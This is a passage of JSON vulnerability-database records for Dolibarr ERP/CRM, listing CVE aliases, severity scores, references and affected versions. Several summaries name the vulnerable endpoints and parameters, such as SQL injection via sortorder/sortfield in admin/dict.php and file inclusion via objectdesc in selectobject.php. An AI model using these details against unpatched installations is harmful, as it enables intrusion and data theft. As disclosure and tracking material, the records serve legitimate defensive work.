vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-tghv-9zk4-6fde"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2"}],"aliases":["CVE-2018-10092","GHSA-6j62-m2vv-wc3m"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dzuu-tkyp-8udb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/72597?format=json","vulnerability_id":"VCID-en1t-b8gx-6bgt","summary":"A vulnerability was identified in Dolibarr ERP CRM up to 23.0.2. This affects the function _checkValForAPI of the file htdocs/expedition/class/expedition.class.php of the component Shipments API Endpoint. The manipulation of the argument fields leads to sql injection. The attack is possible to be carried out remotely. A high degree of complexity is needed for the attack. It is indicated that the exploitability is difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-7688","reference_id":"","reference_type":"","scores":[{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08308","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-7688"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-7688","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-7688"},{"reference_url":"https://vuldb.com/vuln/360858","reference_id":"360858","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR"},{"value":"5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T19:47:51Z/"}],"url":"https://vuldb.com/vuln/360858"},{"reference_url":"https://vuldb.com/submit/799337","reference_id":"799337","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR"},{"value":"5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T19:47:51Z/"}],"url":"https://vuldb.com/submit/799337"},{"reference_url":"https://vuldb.com/vuln/360858/cti","reference_id":"cti","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv2","scoring_elements":"AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR"},{"value":"5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T19:47:51Z/"}],"url":"https://vuldb.com/vuln/360858/cti"},{"reference_url":"https://github.com/advisories/GHSA-rvwr-q5hj-wq7g","reference_id":"GHSA-rvwr-q5hj-wq7g","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-rvwr-q5hj-wq7g"}],"fixed_packages":[],"aliases":["CVE-2026-7688","GHSA-rvwr-q5hj-wq7g"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-en1t-b8gx-6bgt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/39176?format=json","vulnerability_id":"VCID-et1a-rh8j-17ad","summary":"Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters sortorder y sortfield in /dolibarr/admin/dict.php.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5314","reference_id":"","reference_type":"","scores":[{"value":"0.00106","scoring_system":"epss","scoring_elements":"0.28297","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5314"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5314","reference_id":"CVE-2024-5314","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5314"},{"reference_url":"https://github.com/advisories/GHSA-c3h9-q3jx-w7fc","reference_id":"GHSA-c3h9-q3jx-w7fc","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c3h9-q3jx-w7fc"},{"reference_url":"https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms","reference_id":"multiple-vulnerabilities-dolibarrs-erp-cms","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-05-24T13:43:18Z/"}],"url":"https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/455558?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2"}],"aliases":["CVE-2024-5314","GHSA-c3h9-q3jx-w7fc"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-et1a-rh8j-17ad"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/74682?format=json","vulnerability_id":"VCID-f3k5-kjua-mqes","summary":"Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions 22.0.4 and prior, there is a Local File Inclusion (LFI) vulnerability in the core AJAX endpoint /core/ajax/selectobject.php. By manipulating the objectdesc parameter and exploiting a fail-open logic flaw in the core access control function restrictedArea(), an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as .env, .htaccess, configuration backups, or logs…). At time of publication, there are no publicly available patches.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34036","reference_id":"","reference_type":"","scores":[{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04436","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34036"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34036","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34036"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a","reference_id":"743c22e57c0b2a017d6b92bec865d71ce6177a6a","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:14Z/"}],"url":"https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a"},{"reference_url":"https://github.com/advisories/GHSA-2mfj-r695-5h9r","reference_id":"GHSA-2mfj-r695-5h9r","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-2mfj-r695-5h9r"},{"reference_url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r","reference_id":"GHSA-2mfj-r695-5h9r","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:14Z/"}],"url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r"}],"fixed_packages":[],"aliases":["CVE-2026-34036","GHSA-2mfj-r695-5h9r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-f3k5-kjua-mqes"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/321699?format=json","vulnerability_id":"VCID-f96a-99zf-kfcf","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-12669","reference_id":"","reference_type":"","scores":[{"value":"0.00289","scoring_system":"epss","scoring_elements":"0.52688","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-12669"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/c1b530f58f6f01081ddbeaa2092ef308c3ec2727","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/c1b530f58f6f01081ddbeaa2092ef308c3ec2727"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-12669","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-12669"},{"reference_url":"https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/11.0.4","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/11.0.4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/16507?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79r7-e5j6-43fz"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-jb1j-bjyk-gqcc"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-np78-43e1-1yc5"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.4"},{"url":"http://public2.vulnerablecode.io/api/packages/385269?format=json","purl":"pkg:composer/dolibarr/dolibarr@12.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@12.0.0"}],"aliases":["CVE-2020-12669","GHSA-rg8m-84jf-9367"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-f96a-99zf-kfcf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/204822?format=json","vulnerability_id":"VCID-fyuf-7bvy-b3am","summary":"XSS in Dolibarr","references":[{"reference_url":"http://packetstormsecurity.com/files/157752/Dolibarr-11.0.3-Cross-Site-Scripting.html","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://packetstormsecurity.com/files/157752/Dolibarr-11.0.3-Cross-Site-Scripting.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-13094","reference_id":"","reference_type":"","scores":[{"value":"0.01707","scoring_system":"epss","scoring_elements":"0.82731","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-13094"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/11.0.4/ChangeLog","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/11.0.4/ChangeLog"},{"reference_url":"https://www.dolibarr.org/dolibarr-erp-crm-11-0-4-maintenance-release-for-branch-11-0-is-available.php","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org/dolibarr-erp-crm-11-0-4-maintenance-release-for-branch-11-0-is-available.php"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13094","reference_id":"CVE-2020-13094","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13094"},{"reference_url":"https://github.com/advisories/GHSA-cxvr-r92m-q9hw","reference_id":"GHSA-cxvr-r92m-q9hw","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cxvr-r92m-q9hw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/16507?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79r7-e5j6-43fz"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-jb1j-bjyk-gqcc"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-np78-43e1-1yc5"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.4"}],"aliases":["CVE-2020-13094","GHSA-cxvr-r92m-q9hw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fyuf-7bvy-b3am"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/313685?format=json","vulnerability_id":"VCID-gk4m-a13r-ekd6","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19212","reference_id":"","reference_type":"","scores":[{"value":"0.01154","scoring_system":"epss","scoring_elements":"0.7894","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19212"},{"reference_url":"https://herolab.usd.de/en/security-advisories","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H